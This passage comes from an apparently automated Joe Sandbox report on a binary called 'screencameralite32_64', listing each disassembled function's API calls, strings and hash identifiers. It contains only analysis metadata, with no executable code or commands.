                                                              • Opcode Fuzzy Hash: 38b9737883fc8e24fcfd9153147eabf94f65b82359149a36708983ae4cbb5a5c
                                                              • Instruction Fuzzy Hash: ECE0307554024EAADF10FAA4CC089EFBB6DAB0074DF4085A5AC1566590EB719704A9E1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C737B6
                                                              • __localtime64.LIBCMT ref: 02C737C1
                                                                • Part of subcall function 02C82540: __gmtime64_s.LIBCMT ref: 02C82553
                                                              • std::exception::exception.LIBCMT ref: 02C737D9
                                                                • Part of subcall function 02C82413: std::exception::_Copy_str.LIBCMT ref: 02C8242C
                                                                • Part of subcall function 02C7A45B: __EH_prolog.LIBCMT ref: 02C7A460
                                                                • Part of subcall function 02C7A45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C7A46F
                                                                • Part of subcall function 02C7A45B: __CxxThrowException@8.LIBCMT ref: 02C7A48E
                                                              Strings
                                                              • could not convert calendar time to UTC time, xrefs: 02C737CE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                              • String ID: could not convert calendar time to UTC time
                                                              • API String ID: 1963798777-2088861013
                                                              • Opcode ID: 60a21b2248670a3d58dbb763a89c25db5e2b0f98c0ffc3a0b7bfaa3ecaa1161f
                                                              • Instruction ID: 0d29dbedd3078de487645d7b00379082f72673fdf31f969b29976ecef082ce56
                                                              • Opcode Fuzzy Hash: 60a21b2248670a3d58dbb763a89c25db5e2b0f98c0ffc3a0b7bfaa3ecaa1161f
                                                              • Instruction Fuzzy Hash: F9E06DF1D0024A9ACF00FF90D9087AEB7B9FB04304F4085A9D815A3540EB355616AE95
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00402E6A), ref: 0040315F
                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040316F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                              • API String ID: 1646373207-3105848591
                                                              • Opcode ID: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                              • Instruction ID: 396ae008ee37b43aaac66eedf252cb0d6854bca9fd0baad0eaa83bc1c4717f20
                                                              • Opcode Fuzzy Hash: ee4fb49231880130fc7adb82ded6e302562b2849836945389797dfa68bab57f4
                                                              • Instruction Fuzzy Hash: 14C01270380B00A6EA201FB20F0AB2628AC1B48B03F1800BEA289F81C0CE7CC600843D
                                                              APIs
                                                              • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040403A), ref: 00404C3D
                                                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040403A), ref: 00404C61
                                                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040403A), ref: 00404C7B
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040403A), ref: 00404D3C
                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040403A), ref: 00404D53
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual$FreeHeap
                                                              • String ID:
                                                              • API String ID: 714016831-0
                                                              • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                              • Instruction ID: 583ec5426b209604bff2a02b3d2478297b9ba55a468d27544d52312baf66a8bd
                                                              • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                              • Instruction Fuzzy Hash: BC31E2B15417019BE3348F24EE44B22B7A0EBC8754F11863AE665B73E1EB78A844CB5C
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00008000,00004000,74DEDFF0,?,00000000), ref: 00404696
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004046F1
                                                              • HeapFree.KERNEL32(00000000,?), ref: 00404703
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Free$Virtual$Heap
                                                              • String ID: 4/@
                                                              • API String ID: 2016334554-3101945251
                                                              • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                              • Instruction ID: 876bcf6037267374920b0e9be09a40bf20dde446c7cba65ee9efa19dd1b870bf
                                                              • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                              • Instruction Fuzzy Hash: 4AB18EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer_memmove
                                                              • String ID:
                                                              • API String ID: 1721217611-0
                                                              • Opcode ID: 5fedbdf194d3e6ce8f9e2509c9e7e5f173b8ae400c7947942d6dd98e908c3597
                                                              • Instruction ID: 0430bd9e0fb23b0bd155f4630b7298aba77bf59707976f9d9babe444ce0404e6
                                                              • Opcode Fuzzy Hash: 5fedbdf194d3e6ce8f9e2509c9e7e5f173b8ae400c7947942d6dd98e908c3597
                                                              • Instruction Fuzzy Hash: 6C4191372043439AEB2C7E65D841B7A33A69F8172CF29C41FE849865E1DB71E7C1DA21
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C74149), ref: 02C812FF
                                                                • Part of subcall function 02C73FDC: __EH_prolog.LIBCMT ref: 02C73FE1
                                                                • Part of subcall function 02C73FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02C73FF3
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C812F4
                                                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C74149), ref: 02C81340
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C74149), ref: 02C81411
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$Event$CreateH_prolog
                                                              • String ID:
                                                              • API String ID: 2825413587-0
                                                              • Opcode ID: 7cfd8188a915ca3c1b725f9d105ffa518e83ef0ac0d1f6b7121fd5533c43f71a
                                                              • Instruction ID: 0a9bb4a21ba35904501fbe19bb5b78a70332b56687e12fc1d29fd85d74d21ec4
                                                              • Opcode Fuzzy Hash: 7cfd8188a915ca3c1b725f9d105ffa518e83ef0ac0d1f6b7121fd5533c43f71a
                                                              • Instruction Fuzzy Hash: 9951A2B16007458BDF21EF28C88479AB7E5BF8832CF198628E86D97390D775D906CF91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                              • Instruction ID: 2d8af27aea3dc3818037b95797e29a09c3518f496f8a7f2fb56614956bce7d78
                                                              • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                              • Instruction Fuzzy Hash: F441FAB5700785AFDB18BF69C98056E77A6AF84B6CB14D1BEE815C7240D770DE41CB40
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C8FE8B
                                                              • __isleadbyte_l.LIBCMT ref: 02C8FEB9
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02C8FEE7
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02C8FF1D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: d4a728822c2b67a90592e3cb557ffe92b5d7959545fb10e53d581de611663630
                                                              • Instruction ID: 0271e2493b28bfe8df85bdccc6b2d1d1fb104b4a50c9ed3a4efbae820a45f0e7
                                                              • Opcode Fuzzy Hash: d4a728822c2b67a90592e3cb557ffe92b5d7959545fb10e53d581de611663630
                                                              • Instruction Fuzzy Hash: FB31E132600286AFDB21AE35CC44BAA7BEAFF82318F55816CE858C7991D731D951DB90
                                                              APIs
                                                              • htons.WS2_32(?), ref: 02C73DA2
                                                                • Part of subcall function 02C73BD3: __EH_prolog.LIBCMT ref: 02C73BD8
                                                                • Part of subcall function 02C73BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C73BED
                                                              • htonl.WS2_32(00000000), ref: 02C73DB9
                                                              • htonl.WS2_32(00000000), ref: 02C73DC0
                                                              • htons.WS2_32(?), ref: 02C73DD4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                              • String ID:
                                                              • API String ID: 3882411702-0
                                                              • Opcode ID: d82ae3832110cfc31fdf8d1ab913a09c6eb3c95b50a2d68332271f39a7e2aaff
                                                              • Instruction ID: ef773c766bd86879fa003e6b0e9f9d0992331e3714e12983cfed26a6d7a16e0d
                                                              • Opcode Fuzzy Hash: d82ae3832110cfc31fdf8d1ab913a09c6eb3c95b50a2d68332271f39a7e2aaff
                                                              • Instruction Fuzzy Hash: F411A575920249EFCF019F64D889A6AB7B9FF49310F008496FC08DF215D771DA18DBA5
                                                              APIs
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02C723D0
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C723DE
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C72401
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C72408
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 4018804020-0
                                                              • Opcode ID: 1d1eca1c89c9a96d62c83484059e4c5889c2d34d31c837576aeeb7fb9be85250
                                                              • Instruction ID: 32e56b561e8ce6f8b0f252414cba8f0cc58a4ba4249a4dc7722fcad7fce90a81
                                                              • Opcode Fuzzy Hash: 1d1eca1c89c9a96d62c83484059e4c5889c2d34d31c837576aeeb7fb9be85250
                                                              • Instruction Fuzzy Hash: 3211E172601304ABDB209F61C888B6ABBB9FF40708F1044ADF9019B140E7B1F955CBA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: e403baa26494d3b86ac4a10ee5f857358922770d496f59456d0755fd878da292
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: E7011C7304014EBBCF1A6E84CC418EE3F67BB58758B498416FA2899131D736C6B1EBA1
                                                              APIs
                                                              • ___BuildCatchObject.LIBCMT ref: 02C8BC84
                                                                • Part of subcall function 02C8C29B: ___AdjustPointer.LIBCMT ref: 02C8C2E4
                                                              • _UnwindNestedFrames.LIBCMT ref: 02C8BC9B
                                                              • ___FrameUnwindToState.LIBCMT ref: 02C8BCAD
                                                              • CallCatchBlock.LIBCMT ref: 02C8BCD1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                              • String ID:
                                                              • API String ID: 2633735394-0
                                                              • Opcode ID: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                              • Instruction ID: def55ff7767c570c932938ff3a59dd8ae2a2e346d4e7dd06dfe92c73b483d150
                                                              • Opcode Fuzzy Hash: bf7e6a2e7c15418c5902c0973dae014681d9a77571f4c99d076f4f289f483f1c
                                                              • Instruction Fuzzy Hash: 3D01D772000509BBCF126F55CD40EDA3BBAFF89758F158115FA18A6120D732E962EFA0
                                                              APIs
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C724A9
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C724B8
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C724CD
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C724D4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 4018804020-0
                                                              • Opcode ID: 5b6302ccab6923e1c3e8e190bfb004e134fb014c1afd40105819fc33ad94e60f
                                                              • Instruction ID: e27e085450e639964ad6e0623d3ec7ae5c262520d697ac771dde5291a109838a
                                                              • Opcode Fuzzy Hash: 5b6302ccab6923e1c3e8e190bfb004e134fb014c1afd40105819fc33ad94e60f
                                                              • Instruction Fuzzy Hash: 6FF03CB2541205AFDB00AFA9E888F9ABBACFF45710F008529FA05C6141D771E5648FA1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C72009
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 02C72028
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C72037
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C7204E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                              • String ID:
                                                              • API String ID: 2456309408-0
                                                              • Opcode ID: 0cc74bd570cddcd77d5eff4c0cd34aaa9eb4fa22519d4a9a8df8d2f704d652e3
                                                              • Instruction ID: df59f33ba4eec551a65d843e005b28f25b2ce8948db9a665e93a62925f8c30c9
                                                              • Opcode Fuzzy Hash: 0cc74bd570cddcd77d5eff4c0cd34aaa9eb4fa22519d4a9a8df8d2f704d652e3
                                                              • Instruction Fuzzy Hash: 6C01D1B14017049BC728AF54E90CBAAFBB4FF04704F004A5DE84682590CB706658CFA5
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$H_prologSleep
                                                              • String ID:
                                                              • API String ID: 1765829285-0
                                                              • Opcode ID: 2f8c6f1e8a2aaa128444a7ac50c47f6538738cbd30bb8b39287ff7a7668ff4f4
                                                              • Instruction ID: 64e099ec6c28a5b37c403cb5389057f704370887c486eed039002897fcffdf89
                                                              • Opcode Fuzzy Hash: 2f8c6f1e8a2aaa128444a7ac50c47f6538738cbd30bb8b39287ff7a7668ff4f4
                                                              • Instruction Fuzzy Hash: 0BF05E76651110EFDF009FA4D8CDB88BBA4FF0D321F5082A9FA19DB290C7759854CBA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmove
                                                              • String ID: &'
                                                              • API String ID: 3529519853-655172784
                                                              • Opcode ID: 84d99bbc635ed65bd81627e048cdc9f4d4390cc5dd6a2725b19ed39176b2b9a9
                                                              • Instruction ID: fefb0f63f817430df4e998f68656fc88e9677aa78c14c6320ccbfec95ff26ed9
                                                              • Opcode Fuzzy Hash: 84d99bbc635ed65bd81627e048cdc9f4d4390cc5dd6a2725b19ed39176b2b9a9
                                                              • Instruction Fuzzy Hash: F5619F71D00219DFDF20EFA4C980AEDBBBABF48310F10816AD509BB290D7719A45DFA1
                                                              APIs
                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 00406043
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID: $
                                                              • API String ID: 1807457897-3032137957
                                                              • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                              • Instruction ID: a42b242f0737112a64efb8245030e7df3adc9bcb2e8c8469847d94988edb9e3f
                                                              • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                              • Instruction Fuzzy Hash: 7B413731004158AEEB119754DD89BFB3FE9DB06700F1501F6D58BFB1D3C23949648BAA
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C78306,?,?,00000000), ref: 02C79603
                                                              • getsockname.WS2_32(?,?,?), ref: 02C79619
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: &'
                                                              • API String ID: 566540725-655172784
                                                              • Opcode ID: 02e60f9e900c8794434ef2a73ada4f882cec95cf0de25cc7598f4623ee19a1db
                                                              • Instruction ID: 3b47ca48eb92cc8085e715141abd6a76af05468022b7a3ceafb66454c19254ae
                                                              • Opcode Fuzzy Hash: 02e60f9e900c8794434ef2a73ada4f882cec95cf0de25cc7598f4623ee19a1db
                                                              • Instruction Fuzzy Hash: 0E213EB6A10248DBDB10DFA8D845ACEB7F5FF48324F11C56AE919EB280D730A9458B90
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7CBE7
                                                                • Part of subcall function 02C7D1C3: std::exception::exception.LIBCMT ref: 02C7D1F2
                                                                • Part of subcall function 02C7D979: __EH_prolog.LIBCMT ref: 02C7D97E
                                                                • Part of subcall function 02C83A8F: _malloc.LIBCMT ref: 02C83AA7
                                                                • Part of subcall function 02C7D222: __EH_prolog.LIBCMT ref: 02C7D227
                                                              Strings
                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02C7CC1D
                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C7CC24
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                              • API String ID: 1953324306-1943798000
                                                              • Opcode ID: cee0292cc46fc43cfbd3ab771a659a9ac2c93bab7b9d80a4df5fd996a30d1fa3
                                                              • Instruction ID: fea477ff8b5036894f00e8a54cccac8aae3f895a1587adf79887543770572793
                                                              • Opcode Fuzzy Hash: cee0292cc46fc43cfbd3ab771a659a9ac2c93bab7b9d80a4df5fd996a30d1fa3
                                                              • Instruction Fuzzy Hash: CD218DB1E01248DBDB14EFE8E954AEEBBB9EF54704F00415EE806A7280DB705A44DF51
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7CCDC
                                                                • Part of subcall function 02C7D29A: std::exception::exception.LIBCMT ref: 02C7D2C7
                                                                • Part of subcall function 02C7DAB0: __EH_prolog.LIBCMT ref: 02C7DAB5
                                                                • Part of subcall function 02C83A8F: _malloc.LIBCMT ref: 02C83AA7
                                                                • Part of subcall function 02C7D2F7: __EH_prolog.LIBCMT ref: 02C7D2FC
                                                              Strings
                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02C7CD19
                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02C7CD12
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                              • API String ID: 1953324306-412195191
                                                              • Opcode ID: f86e5bc70c366eee243e82c4ef043e46ed883df9776bfa2f9324fac9e7aee727
                                                              • Instruction ID: 354fbc4e1f871abc1c1cb74433f09e99a04542c55083dfbb1f3f14b129545c29
                                                              • Opcode Fuzzy Hash: f86e5bc70c366eee243e82c4ef043e46ed883df9776bfa2f9324fac9e7aee727
                                                              • Instruction Fuzzy Hash: C22180B1E00294DBDB04EFE8D854BADBBB5FF54704F10425DE806A7280DB705A48DB91
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02C7535D
                                                                • Part of subcall function 02C82EEC: __FF_MSGBANNER.LIBCMT ref: 02C82F03
                                                                • Part of subcall function 02C82EEC: __NMSG_WRITE.LIBCMT ref: 02C82F0A
                                                                • Part of subcall function 02C82EEC: RtlAllocateHeap.NTDLL(00B60000,00000000,00000001), ref: 02C82F2F
                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02C7536F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateFolderHeapPathSpecial_malloc
                                                              • String ID: \save.dat
                                                              • API String ID: 4128168839-3580179773
                                                              • Opcode ID: 5723d4d766046cfc09b0c31163050dc4167e51e42c6a5cd8b9a0cdfd85429a90
                                                              • Instruction ID: 30e5c6b7d2bd8ba8c43042e68112408150a529be0a3c3a1461492eb173b1b227
                                                              • Opcode Fuzzy Hash: 5723d4d766046cfc09b0c31163050dc4167e51e42c6a5cd8b9a0cdfd85429a90
                                                              • Instruction Fuzzy Hash: 93117D739042406BDB21AE258C84A6FFF6BDF82A54B5041A9EC4967201D6A30E02C6A0
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C7396A
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02C739C1
                                                                • Part of subcall function 02C71410: std::exception::exception.LIBCMT ref: 02C71428
                                                                • Part of subcall function 02C7A551: __EH_prolog.LIBCMT ref: 02C7A556
                                                                • Part of subcall function 02C7A551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C7A565
                                                                • Part of subcall function 02C7A551: __CxxThrowException@8.LIBCMT ref: 02C7A584
                                                              Strings
                                                              • Day of month is not valid for year, xrefs: 02C739AC
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Day of month is not valid for year
                                                              • API String ID: 1404951899-1521898139
                                                              • Opcode ID: 345b7f68973325bd67a10f0a5131997f53ca6e50b625a748708a6293912c6e24
                                                              • Instruction ID: a10bfcd193a1cb036aa23f2a1de7f287a3d67a735e382f71291d2eb476b153f4
                                                              • Opcode Fuzzy Hash: 345b7f68973325bd67a10f0a5131997f53ca6e50b625a748708a6293912c6e24
                                                              • Instruction Fuzzy Hash: 8101D476810209EADF05EFE4D809AEEBB79FF18750F40801AEC04A3300EB748B55EB95
                                                              APIs
                                                              • std::exception::exception.LIBCMT ref: 02C7FA4A
                                                              • __CxxThrowException@8.LIBCMT ref: 02C7FA5F
                                                                • Part of subcall function 02C83A8F: _malloc.LIBCMT ref: 02C83AA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 4063778783-2104205924
